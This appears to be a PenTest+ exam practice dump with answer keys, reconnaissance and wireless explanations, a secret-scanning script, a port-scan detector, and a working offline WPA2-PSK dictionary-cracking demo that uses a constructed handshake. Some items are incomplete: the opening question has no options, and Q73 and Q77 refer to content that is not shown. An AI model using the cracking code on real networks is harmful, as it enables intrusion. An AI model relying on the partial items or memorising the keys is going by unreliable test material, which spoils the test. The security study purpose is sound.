User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?
A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment. Which of the following would most likely produce useful information for additional testing?
A. Searching for code repositories associated with a developer who previously worked for the target company
B. Searching for code repositories associated with the target company's organization
C. Searching for code repositories associated with the target company's competitors
D. Searching for code repositories associated with the target company's customers
Correct Answer: B
Code repositories are online platforms (GitHub, GitLab, Bitbucket, SourceForge and similar) that store and manage source code and related files for software projects. Repositories belonging to the target company's organization are the most directly useful for later stages of an assessment: they reveal which applications the company builds or uses, their versions and dependencies, and they frequently contain hard-coded credentials, API keys, internal hostnames, comments and documentation that point at exploitable weaknesses. Such repositories can be located with the hosting platforms' own search features, and their contents (including commit history, where removed secrets often survive) can be checked with secret-scanning tools such as gitleaks or TruffleHog. The other options are less likely to produce useful information. Repositories of a developer who previously worked for the target company may be outdated, or may have been deleted, moved or rewritten since the developer left. Repositories of the target company's competitors or customers may concern different, unrelated projects, or may be private and inaccessible.
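As an added illustration (not part of the original question or its explanation), the following script shows the kind of check a tester runs over a cloned repository once it has been found: pattern matching for well-known key formats, credentials embedded in connection URLs and hard-coded secret assignments, plus a Shannon-entropy check that catches random-looking tokens the patterns miss. The repository contents, file names and the secret values are constructed for the example (the AWS values are the documented AWS example credentials, not live keys).

```python
"""Scan repository contents for leaked credentials (constructed sample, runs offline)."""
import math
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample of a checked-out repository: path -> file contents.
SAMPLE_REPO: Dict[str, str] = {
    "config/settings.py": (
        "DEBUG = False\n"
        "DATABASE_URL = 'postgres://app:Sup3rS3cret!@db.internal:5432/app'\n"
        "AWS_ACCESS_KEY_ID = 'AKIAIOSFODNN7EXAMPLE'\n"
        "AWS_SECRET_ACCESS_KEY = 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY'\n"
    ),
    "deploy/id_rsa": (
        "-----BEGIN RSA PRIVATE KEY-----\nMIIEow...\n-----END RSA PRIVATE KEY-----\n"
    ),
    "src/app.py": "import os\nDB_PASSWORD = os.environ['DB_PASSWORD']\n",  # clean: read from env
    "README.md": "# Internal billing service\nRun `make test` before pushing.\n",
}

# Signature patterns: structured key formats first, then generic assignments.
PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("private_key", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----")),
    ("credential_in_url", re.compile(r"[a-z][a-z0-9+.\-]*://[^/\s:]+:[^@\s]+@", re.I)),
    ("hardcoded_secret", re.compile(
        r"(?i)(password|passwd|secret|api[_-]?key|token)[a-z0-9_]*\s*[=:]\s*['\"]([^'\"]{8,})['\"]")),
]
# Candidate tokens for the entropy check: long runs of base64/hex-style characters.
TOKEN_RE = re.compile(r"[A-Za-z0-9+/=_\-]{20,}")
ENTROPY_THRESHOLD = 4.0  # bits per character; identifiers sit below, random keys above


@dataclass(frozen=True)
class Finding:
    category: str
    path: str
    line_no: int
    snippet: str


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character, estimated from the character frequencies."""
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def scan_file(path: str, text: str) -> List[Finding]:
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for category, pat in PATTERNS:
            for m in pat.finditer(line):
                findings.append(Finding(category, path, line_no, m.group(0)[:60]))
        for m in TOKEN_RE.finditer(line):
            token = m.group(0)
            if shannon_entropy(token) >= ENTROPY_THRESHOLD:
                findings.append(Finding("high_entropy_string", path, line_no, token[:60]))
    return findings


def scan_repo(repo: Dict[str, str]) -> List[Finding]:
    return [f for path, text in repo.items() for f in scan_file(path, text)]


def count_by_category(findings: List[Finding]) -> Dict[str, int]:
    return dict(Counter(f.category for f in findings))


if __name__ == "__main__":
    for f in scan_repo(SAMPLE_REPO):
        print(f"{f.path}:{f.line_no}: {f.category}: {f.snippet}")
```

Against the constructed repository the scan flags only `config/settings.py` and `deploy/id_rsa`; the `os.environ` lookup in `src/app.py` is correctly ignored. The entropy threshold is a heuristic: the AWS secret key scores about 4.7 bits per character and is caught twice, while the identifier `AWS_SECRET_ACCESS_KEY` scores about 3.1 and is not. On a real repository, run the same logic over every commit, not just the checked-out tree.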
Question 73:
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:
Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A. Edit the discovered file with one line of code for remote callback
B. Download .pl files and look for usernames and passwords
C. Edit the smb.conf file and upload it to the server
D. Download the smb.conf file and look at configurations
Correct Answer: C
Question 74:
During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?
A. Changing to Wi-Fi equipment that supports strong encryption
B. Using directional antennae
C. Using WEP encryption
D. Disabling Wi-Fi
Correct Answer: A
If a penetration tester was able to join the organization's wireless network from outside the building using Aircrack-ng, the network was not protected with strong encryption or authentication. Aircrack-ng is a suite for capturing and attacking 802.11 traffic: it recovers WEP keys statistically from captured initialization vectors (using packet injection and replay to speed up collection), and it recovers WPA/WPA2-PSK passphrases by capturing the four-way handshake and running an offline dictionary or brute-force attack against it. The remediation is Wi-Fi equipment that supports strong encryption: WPA2 with a long, random pre-shared key or, better, WPA2/WPA3-Enterprise with 802.1X authentication, or WPA3-Personal, whose SAE handshake resists offline dictionary attacks. Directional antennae may reduce how far the signal leaks, but an attacker within range can still capture traffic and attack weak encryption. WEP is not a remediation: it is broken, and it is exactly what Aircrack-ng cracks fastest. Disabling Wi-Fi removes the risk, but also all the benefits of wireless connectivity for the organization.
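To make the WPA/WPA2-PSK weakness concrete, here is an added example (not from the question, the exam guide or the Aircrack-ng project) that reproduces the offline attack in pure Python: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), PTK = PRF-512 over the two MAC addresses and nonces, and the EAPOL-Key MIC check that tells a cracker when a candidate passphrase is right. The handshake is constructed locally from a known passphrase rather than taken from a real capture; the MAC addresses, nonces and wordlist are arbitrary values chosen for the example.

```python
"""Why a WPA/WPA2 pre-shared key falls to an offline dictionary attack (constructed demo)."""
import hashlib
import hmac
from typing import List, Optional, Tuple

MIC_OFFSET = 81  # byte offset of the 16-byte Key MIC field inside an EAPOL-Key frame


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK/PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, 'Pairwise key expansion', min/max MACs || min/max nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes of HMAC-SHA1 output, truncated to 64 bytes
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for CCMP (descriptor version 2): HMAC-SHA1-128 over the frame with the MIC zeroed."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2 of the four-way handshake (constructed layout, 99 bytes)."""
    body = (
        b"\x02"                            # descriptor type: RSN
        + b"\x01\x0a"                      # key info: MIC set, pairwise, descriptor version 2
        + b"\x00\x10"                      # key length: 16 (CCMP)
        + (1).to_bytes(8, "big")           # replay counter
        + snonce                           # 32-byte supplicant nonce
        + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID (unused here)
        + mic                              # 16-byte key MIC, lands at offset 81
        + b"\x00\x00"                      # key data length 0
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v1, type EAPOL-Key


# Constructed handshake parameters (arbitrary MAC addresses and nonces).
SSID = "IEEE"
AA = bytes.fromhex("001122334455")    # authenticator (AP) MAC
SPA = bytes.fromhex("66778899aabb")   # supplicant (client) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def capture_handshake(true_passphrase: str) -> bytes:
    """Stand-in for the message-2 frame airodump-ng would capture on the air."""
    kck = wpa2_ptk(wpa2_pmk(true_passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE)))


def crack_psk(frame: bytes, wordlist: List[str]) -> Tuple[Optional[str], int]:
    """Offline dictionary attack: (passphrase, candidates tried), or (None, n) if no hit."""
    target_mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for tried, candidate in enumerate(wordlist, start=1):
        kck = wpa2_ptk(wpa2_pmk(candidate, SSID), AA, SPA, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), target_mic):
            return candidate, tried
    return None, len(wordlist)


WORDLIST = ["letmein", "qwerty123", "password", "hunter2"]  # constructed

if __name__ == "__main__":
    captured = capture_handshake("password")
    print(crack_psk(captured, WORDLIST))
```

Nothing is sent to the access point after the handshake is captured: every candidate is checked locally, and the only cost per guess is the 4096-iteration PBKDF2, which GPUs evaluate hundreds of thousands of times per second. That is why a short or dictionary passphrase on WPA2-PSK is a finding, why a long random PSK or 802.1X authentication removes it, and why WPA3's SAE (which requires an online exchange per guess) is the stronger recommendation.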
Question 75:
Which of the following should be included in scope documentation?
A. Service accounts
B. Tester experience
C. Disclaimer
D. Number of tests
Correct Answer: C
A disclaimer is a statement that limits the liability of the penetration tester and the client in case of any unintended consequences or damages caused by the testing activities. It should be included in the scope documentation to clarify the roles and responsibilities of both parties and to avoid legal disputes or misunderstandings. Service accounts, tester experience, and the number of tests are not essential elements of the scope documentation, although they may be relevant to other parts of the engagement. References: The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 1: Planning and Scoping Penetration Tests; The Official CompTIA PenTest+ Student Guide (Exam PT0-002), Lesson 1: Planning and Scoping Penetration Tests; What is the Scope of a Penetration Test?
Question 76:
A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application.
Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?
A. SQLmap
B. DirBuster
C. w3af
D. OWASP ZAP
Correct Answer: C
w3af, the Web Application Attack and Audit Framework, is an open-source web application scanner whose plugins are grouped by function (crawl/discovery, audit, attack, grep, infrastructure, bruteforce and others). Run with only its crawl and grep plugins, it spiders the application and collects structure, forms, parameters and fingerprint information from ordinary-looking requests, which is the low-noise first step the question asks for; its audit, attack and directory/filename bruteforce plugins exist but should stay disabled for this pass. SQLmap and DirBuster are the opposite: SQLmap fires large numbers of injection payloads and DirBuster generates thousands of requests for non-existent paths, both of which stand out in logs and trigger WAF or IDS alerts. OWASP ZAP is primarily an intercepting proxy and active scanner; its active scan sends attack payloads and is similarly noisy.
Question 77:
The following line-numbered Python code snippet is being used in reconnaissance:
Which of the following line numbers from the script MOST likely contributed to the script triggering a "probable port scan" alert in the organization's IDS?
A. Line 01
B. Line 02
C. Line 07
D. Line 08
Correct Answer: D
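The script itself is not reproduced on the page, but the alert in the question comes from the defender's side, so here is an added example (not from the question or any real IDS) of the detection logic that produces a "probable port scan" alert: a per-(source, destination) sliding window that fires when one source touches at least a threshold number of distinct destination ports within a few seconds. The log format and the connection records are constructed for the example; a line of reconnaissance code that loops over ports and connects to each one in quick succession is exactly what lights this up.

```python
"""Toy 'probable port scan' detector of the kind an IDS applies to connection logs."""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional, Tuple

# Constructed connection-log lines (syslog-like; not from a real sensor).
# 10.0.0.5 hits ten ports on one host in three seconds, 10.0.0.7 is a normal
# HTTPS client, and 10.0.0.9 probes three ports a minute apart.
SAMPLE_LOG = """\
2024-05-01T10:00:00 conn src=10.0.0.7 dst=10.0.0.20 dport=443 proto=tcp
2024-05-01T10:00:01 conn src=10.0.0.5 dst=10.0.0.20 dport=21 proto=tcp
2024-05-01T10:00:01 conn src=10.0.0.5 dst=10.0.0.20 dport=22 proto=tcp
2024-05-01T10:00:01 conn src=10.0.0.5 dst=10.0.0.20 dport=23 proto=tcp
2024-05-01T10:00:01 conn src=10.0.0.5 dst=10.0.0.20 dport=25 proto=tcp
2024-05-01T10:00:02 conn src=10.0.0.7 dst=10.0.0.20 dport=443 proto=tcp
2024-05-01T10:00:02 conn src=10.0.0.5 dst=10.0.0.20 dport=80 proto=tcp
2024-05-01T10:00:02 conn src=10.0.0.5 dst=10.0.0.20 dport=110 proto=tcp
2024-05-01T10:00:02 conn src=10.0.0.5 dst=10.0.0.20 dport=135 proto=tcp
2024-05-01T10:00:03 conn src=10.0.0.5 dst=10.0.0.20 dport=139 proto=tcp
2024-05-01T10:00:03 conn src=10.0.0.5 dst=10.0.0.20 dport=443 proto=tcp
2024-05-01T10:00:03 conn src=10.0.0.5 dst=10.0.0.20 dport=445 proto=tcp
2024-05-01T10:00:04 conn src=10.0.0.7 dst=10.0.0.20 dport=443 proto=tcp
2024-05-01T10:01:30 conn src=10.0.0.9 dst=10.0.0.20 dport=22 proto=tcp
2024-05-01T10:02:30 conn src=10.0.0.9 dst=10.0.0.20 dport=80 proto=tcp
2024-05-01T10:03:30 conn src=10.0.0.9 dst=10.0.0.20 dport=443 proto=tcp
"""

LINE_RE = re.compile(r"^(\S+) conn src=(\S+) dst=(\S+) dport=(\d+) proto=\S+$")


def parse_line(line: str) -> Optional[Tuple[float, str, str, int]]:
    """Return (epoch seconds, src, dst, dport), or None for lines in an unexpected format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.fromisoformat(m.group(1)).timestamp()
    return ts, m.group(2), m.group(3), int(m.group(4))


def detect_port_scans(log: str, threshold: int = 8,
                      window_s: float = 10.0) -> List[Dict[str, object]]:
    """Alert once per (src, dst) when >= threshold distinct ports are touched within window_s."""
    recent: Dict[Tuple[str, str], Deque[Tuple[float, int]]] = defaultdict(deque)
    alerted = set()
    alerts: List[Dict[str, object]] = []
    for line in log.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # in production: count parse failures rather than silently dropping them
        ts, src, dst, port = rec
        window = recent[(src, dst)]
        window.append((ts, port))
        while window and ts - window[0][0] > window_s:
            window.popleft()  # expire events that fell out of the window
        distinct = {p for _, p in window}
        if len(distinct) >= threshold and (src, dst) not in alerted:
            alerted.add((src, dst))
            alerts.append({"src": src, "dst": dst, "distinct_ports": len(distinct),
                           "window_s": window_s, "msg": "probable port scan"})
    return alerts


if __name__ == "__main__":
    for alert in detect_port_scans(SAMPLE_LOG):
        print(alert)
```

With the default threshold (8 distinct ports in 10 seconds) only 10.0.0.5 is reported; the repeated HTTPS client never trips it. The slow probe from 10.0.0.9 is caught only when the window is widened, which is the flip side of the question: a reconnaissance script that spaces its connections out (or randomizes port order across many hosts) is written specifically to stay under a detector like this one.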
Question 78:
A company provided the following network scope for a penetration test: 169.137.1.0/24 221.10.1.0/24 149.14.1.0/24 A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party.
Which of the following stakeholders is responsible for this mistake?
A. The company that requested the penetration test
B. The penetration testing company
C. The target host's owner
D. The penetration tester
E. The subcontractor supporting the test
Correct Answer: A
The company that requested the penetration test is responsible for providing a correct and accurate network scope. The scope defines the boundaries of the test, such as which IP addresses, domains, systems, or networks are in scope and which are excluded. If the company supplied a scope that included an address belonging to a third party, the mistake is the company's. The penetration testing company, the target host's owner, the penetration tester, and the subcontractor supporting the test are not responsible, as they relied on the scope the client provided. In practice the tester should still verify ownership of scoped address ranges (for example with WHOIS/RDAP lookups) before exploiting anything, and the rules of engagement should state explicitly who bears liability for errors in the provided scope.
Question 79:
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?
A. Halt the penetration test.
B. Contact law enforcement.
C. Deconflict with the penetration tester.
D. Assume the alert is from the penetration test.
Correct Answer: C
Deconflicting with the penetration tester is the best thing to do next after the security alarms are triggered during a penetration test, as it will help determine whether the alarm was caused by the tester's activity or by an actual threat. Deconflicting is the process of communicating and coordinating with other parties involved in a penetration testing engagement, such as security teams, network administrators, or emergency contacts, to avoid confusion or interference.
Question 80:
During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder:
/home/user/scripts
Which of the following commands should the penetration tester use to perform this scan?
A. nmap --resume "not intrusive"
B. nmap --script default safe
C. nmap --script /home/user/scripts
D. nmap -load /home/user/scripts
Correct Answer: C
Nmap's --script option accepts a comma-separated list of script names, categories, directory paths or Lua boolean expressions; given a directory, Nmap runs every .nse file in it. `nmap --script /home/user/scripts <target>` therefore runs the custom scripts (add --script-args to pass parameters and --script-trace to watch what they send). The other commands are wrong: --resume continues an aborted scan from its output file and takes no script specification; --script with a category such as default or safe only selects scripts from Nmap's own script database, not from an arbitrary folder (and two space-separated categories would be parsed as a category plus a target, the correct form being --script default,safe); and -load is not an Nmap option. References: Best PenTest+ certification study resources and training materials, CompTIA PenTest+ PT0-002 Cert Guide, 101 Labs -- CompTIA PenTest+: Hands-on Labs for the PT0-002 Exam